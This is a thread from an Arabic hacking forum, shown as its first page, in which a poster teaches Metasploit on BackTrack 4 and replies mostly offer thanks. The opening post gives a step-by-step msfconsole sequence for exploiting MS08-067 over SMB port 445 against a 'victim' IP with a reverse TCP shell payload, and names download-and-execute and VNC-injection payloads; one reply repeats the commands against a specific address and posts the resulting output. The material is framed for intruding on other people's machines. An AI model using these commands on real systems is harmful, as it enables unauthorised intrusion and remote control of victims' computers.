اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الميتاسبلويت تعريفه و طريقة استغلال ثغراته

الميتاسبلويت تعريفه و طريقة استغلال ثغراته


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 14

الموضوع: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

  1. #1
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    الجحيم
    المشاركات
    249

    New الميتاسبلويت تعريفه و طريقة استغلال ثغراته



    بسم الله الرحمن الرحيم



    دورة الميتاسبلويت بما قدّرني الله عبر عدة دروس, اولا مقدمة ثم نبدأ بتعريف الميتاسبلويت ومشروعه,,, ثم استغلال ثغراته
    (متطلبات الدروس:: 1- لغة إنكليزي. 2- معرفة بالدوس والشيل. 3- برنامج nmap -- metasploit -- nc)
    (((ولم أضع صور إلا عند الحاجة)))



    انتشر في آخر الأيام برامج الإختراق وتكوين السيرفرات والدمج والتشفير والتلغيم وتلغيم الصفحات وغير ذلك من إختراق عشوائي, اشتغل به الجميع وبدأو يتباهو به وكل واحد يحط بتوقيعه كم ضحية عنده وهيك .. وتباهو بأنهم يعرفو يشفرو السيرفر وما يخلوه ينكشف ..جيد .. لكن كل هؤلاء ما تقدمو بشي .. كل ما في الأمر ان مبرمج صنع برنامج
    ينتج سيرفر تحكم عن بعد والشباب عرفو البرنامج وشفرو السيرفر (مع ان المبرمج دامج البرنامج بحد ذاته)..ثم تأتي تفنن في طرق الإختراق كل واحد على معرفته من دمج مع دودة .. وبوت نت وغير ذلك .. ونسو الإختراق المستهدف ونسو الثغرات والبفر والفيض وغير ذلك اللي تخليك تخترق بدون ارسال أي شي .. وإن نظام ويندوز مشهور جدا . وشخصي لمايكروسوفت,, والان ان أكثر سكان العالم يستخدمونه,وال أيضا انه مليء بالثغرات والأخطاء البرمجية,,وبدأ الهاكرز المبرمجون يستغلو هذه الثغرات حتى يتحكمو عن بعد بجهاز يحوي هذه الثغرة .. لكن في ذلك صعوبة .. من كتابة ثغرة ,, ومعرفة عامة بلغات البرمجة وخاصة بإحدى لغات برمجة النظام مثل السي والأسيمبلي وغيرها
    وكانت مقتصرة على المبرمجين .. وكانت الشركات تتنافس لكي تأويهم من أجل النظر بنقاط الضعف الموجودة ..
    لكن في الأونة الأخيرة ظهر لنا مشروع الميتاسبلويت والذي يقوم على مبدأ إيجاد الثغرات بنظام محدد ومن أجل إغلاقها .. لكن بدأ الجميع يستغله لإيجاد الثغرات والإختراق عن بعد ليس من أجل السيكيوريتي اللتي اقتصرت بها الشركات.. فإن مشروع الميتاسبلويت يحوي بداخله تجميع لثغرات تسمح بالتحكم عن بعد ,, وإظهار الثغرات والفيض بالبرامج ونقاط الضعف .. وإن الميتا مشروع تطويري قد تخطى ذلك بحيث أعطى امكانية التحديث وإضافة الثغرات وصنع ملفات بإمتداد إي أكس إي لكي تمكن بالإتصال العكسي والتنصت و تحكم حسب تعديلاتك واختياراتك,, فإنه يحوي الكثير ,,’’,,

    .. بعرف إني طولت وما كان لازم كتر حكي . . . لكن لازم نعرف شو عم نستخدم ..

    المهم نأتي للشرح , , الميتا في نسختين .. واحدة تعمل على اللينوكس , والتانية على نظام ويندوز .. وأنا أنصح بعد تجرتي أن تستخدموها على نظام لينوكس لما حدث معي من أخطاء على الويندوز ..

    الميتا يأي معه واجهة رسومية .. وواحدة صفحة ويب .. وكونسول متل الدوس يعني كل شي كتابة مش كبسة ماوس .. و شبيه بالكونسول هو msfcli اللي يكون كل شي على سطر واحد مثل اختيار الثغرة وتحديد الهدف والمنفذ وكل شي في سطر .. )

    المهم أنا أفضل استخدام الكونسول msfconsole ,, ويأتي أيضا msfpayload ,, اللي تمكنك من صنع شل كود بإمتداد إي أكي إي جاهز للنفيذ بعد أن يفتحه الضحية وأنت تتنصت ..

    قبل كل شيئ .. هذا للإختراق المستهدف مش العشوائي .. يعني أيبي الضحية معنا ..
    +*+*+*+*+

    اولا سأشرح كيف تستخدم المشروع وتستغل الثغرات ,,

    إخوان .. شرح الواجهة الرسومية والمتصفح بايخ .. كلها كبسات ماوس ..
    سأشرح الـ msfconsole والشرح رح يكون تحت نظام باك تراك 4 لينوكس ,,

    بعد ما نكون دخلنا عليه من /penet/exploits/framework3

    ./msfconsole
    وايضا قبل كل شي .. نسوي تحديث بالأمر svn update .. وننتظر. ثم .,,’’ يفتح البرنامج .. وأرجو ما حدا يتعجب من عدد الثغرات والإختلاف .. فإنه نتيجة للتحديث ..
    المهم .. كل ثغرة وعندها خصاصها .. وكيف نعرف أي ثغرة لازم نختار .. هون لازم يكون عندك برنامج nmap وتكون بحثت عن المنافذ المفتوحة وعرفت أي نظام بيستخدم الضحية

    لنفرض ان المنفذ 23 مفتوح .. عندها لازم نعرف اننا لازم نستغل ثرة التيلنيت سي بروكسي .. او المنفذ 135 rpc او 445 smb .. والشرح رح يكون على المنفذ 445 لأن أكثر الأجهزة والأنظمة مصابة بهذه الثغرة ..( وخاصة الأن بعد وجود ثغرة في نظام ويندوز 7 وفيستا لل smb وعبر المنفذ 445 أيضا )..
    نكتب امر show exploits حتى شوف الثغرات (ملاحظة بالواجهة الرسومية كلها كبسات ماوس) ,, يطلعلنا كتير .. نحنا نختار الثغرة المناسبة حسب المنفذ وبعد ما وجدنا
    445 .. نختار الثغرة المشهورة واللي الكل بيحبها windows/smb/ms08_067_netapi << نكتب عندها use windows/smb/ms08_067_netapi ثم نكتب show options حتى نشوف شو متطلبات الثغرة ..
    الثغرة بحاجة للأيبي الشخصي اللي هو LHOST وندخله عبر هذا الأمر set LHOST YOurIP وأيبي الضحية وهو .. RHOST أيضا ندخله عبر هذا الأمر set RHOST VIctimIP والمنفذ يكون افتراضي مع الثغرة .. ما في داعي نسويله شي ..

    الآن البايلود .. ما هي البايلود ؟ .. هي بعد ان تخترق شو بدك تعمل .. إتصال عكسي, إتصال مباشر, إضافة يوزر, تحميل سيرفر(لمحبي السيرفرات)..
    حتى نشوف شو البايلودس نكتب الأمر show payloads . ويطلعنا كتير نختار اللي نريدها .. انا أفضل الmeterpreter .. لكن سنستخدم بالشرح الإتصال العكسي .. لأني سأضع دروس أخرى عن meterpreter
    وحتى نختار البايلود نكتب set payload payloadname بإمكاننا أن نختار تحميل وتشغيل download/exec ونضع رابط الباتش . , . او نختار vncinject وهو لحقن ملفات
    الدي أل أل وتخليك تشوف سطح المكتب desktop لكن انا أفضل الإتصال العكسي كبداية windows/shell/reverse_tcp وهي لعمل إتصال عكسي مع الدوس ..

    الهم اخترنا كل شي .. نكتب exploit لتطبيق الثغرة .. ونحصل على التحكم بالدوس ..
    إعادة سريعة
    use windows/smb/ms08_067_netapi
    set RHOST victimIP
    set LHOST yourIP
    set payload windows/shell/reverse_tcp
    exploit

    ملاحظة .. ممكن ما تمشي من أولا مرة .. ممكن ثغرة أخرى . رح تواجه أخطاء لكن ما تيئس . كمل . وكل شي تمام ..




    انتهى الدرس الأول وهذا مبدأ الميتاسبلويت وطريقة عمله .. لأبسط الأمور

    اخواني .... ما حدا ينقل الموضوع بدون ذكر المصدر لاني تعبت كثيرااااااااااا لاحظاره و شكرا


    لاتنسووو الردوووووووووود و التقييييييييييييييييييييي يم



  2. #2
    محظور Array
    تاريخ التسجيل
    Nov 2010
    المشاركات
    843

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    يعطيك العافيه يا حب

    طرح جميل يا غالي


  3. #3
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    الجحيم
    المشاركات
    249

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    الله يعافيك يا غالي



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2010
    المشاركات
    2

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    اخى الغالى انا عملت كلة حاجة
    والكلام دة الى ظاهرلى
    اولا دى الخطوات الى عملتة
    الخطوات الى عملتة كان زى ما هتشوفة
    اولا الامر
    show exploits
    ثانيا الامر
    use windows/smb/ms08_067_netapi
    والامر
    show options
    وبعدين بتكتب ايبى الضحية الى فتح البورت445
    والامر
    set rhost192.168.1.7
    والامر
    show payloads
    والامر
    set payload windows/vncinject/reverse_tcp
    والامر
    show options
    وبعدين اكتب الايبى بتاعى
    والامر
    set lhost 192.168.1.5
    والامرالاخير وهو
    exploit
    تكمن المشكلة هنا
    بعد اما اضعط على الامر
    exploit
    بيطلع هذ الكلام[*] Started reverse handler on port 4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >
    ومش عرف اعمل اية فى المشكلة دى مع العلم انا عرف الى فتح البورت445ببرنامج ip range
    فاارجو الحل ووفكك اللة


  5. #5
    هكر متميز Array الصورة الرمزية samilakehal
    تاريخ التسجيل
    Nov 2011
    الدولة
    الحزائر
    المشاركات
    1,109

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    الله يعافيك يا غالي


  6. #6
    هكر نشيط Array الصورة الرمزية haker.23.dz
    تاريخ التسجيل
    Nov 2011
    الدولة
    عالم الظلام
    المشاركات
    157

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    بارك الله فيك كفيت و وفيت



  7. #7
    هكر مبتديء Array الصورة الرمزية hacker.sy
    تاريخ التسجيل
    Jan 2012
    الدولة
    ســـوريـــا الأســــــــد
    المشاركات
    47

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    الله يعطيك العافية
    مشكوووووووووور


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2012
    المشاركات
    93

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    شكرا على الموضوع


  9. #9
    هكر مبتديء Array الصورة الرمزية mothoq
    تاريخ التسجيل
    Jan 2012
    المشاركات
    26

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    سلِمت يداك
    شكرا جزيلا



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2012
    المشاركات
    11

    افتراضي رد: الميتاسبلويت تعريفه و طريقة استغلال ثغراته

    مشكوور بالتوفيق


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. كل ما يخص الايبي -(تعريفه + فوائده + طرق استخراحه+'طرق اخفائه)
    بواسطة JoKeR_pS في المنتدى منتدى الإختراق العام
    مشاركات: 15
    آخر مشاركة: 04-30-2013, 04:06 PM
  2. أومر الميتاسبلويت مع استغلال ثغرة توضيحي
    بواسطة **joba** في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 17
    آخر مشاركة: 10-16-2012, 09:39 AM
  3. فحص الموقع عن طريق الميتاسبلويت
    بواسطة الصخره في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 19
    آخر مشاركة: 05-29-2012, 08:15 AM
  4. طريقة استهداف موقع معين وايجاد ثغراته فيديو
    بواسطة مدمر القراصنة في المنتدى قسم الثغرات
    مشاركات: 273
    آخر مشاركة: 07-20-2010, 06:36 PM
  5. بخصوص الميتاسبلويت
    بواسطة ABA_0oo0 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 02-18-2010, 03:00 PM

وجد الزوار هذه الصفحة بالبحث عن:

اوامر تحديث الميتاسبلويت

الميتاسبلويت تعريفه وطريقة استغلال جيوش الهكر

اختراق بورت باك تراك 445

تحديث الميتاسبلويت الجديد

شرح ثغرة 445

اختراق منفذ 445 بالميتا عبر الباك تراك

استغلال 445

أختراق ويندوز 7 عن طريق الميتاسبلويت

استغلال بورت 445

كيفيه استهداف اي شخص بالميتاسبلويت ومعرفه ثغراتها

طريقة تحديث الميتاسبلويت

مبدأ عمل الميتاسيوت

استغلال ثغره 445

&amp;#1575;&amp;#1587;&amp;#1578;&amp;#1594;&amp;#1604;&amp;#1575;&amp;#1604; &amp;#1576;&amp;#1608;&amp;#1585;&amp;#1578; 445

اوامر ثغره 445

أومر تحديث الميتاسبلويت في الباك تراك

اختراق 445 لويندو 7

آوامر استغلال ثغره 445

اوامر الثغرة المشهورة smb

فتح واجهة الميتا سبلويت على الويندوز 7

اختراق موقع rpc

تعريف دورة الاستغلال

تحديث الميتاسبلويت

smb port شرح اختراق

طريقة تحديث metasploit

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •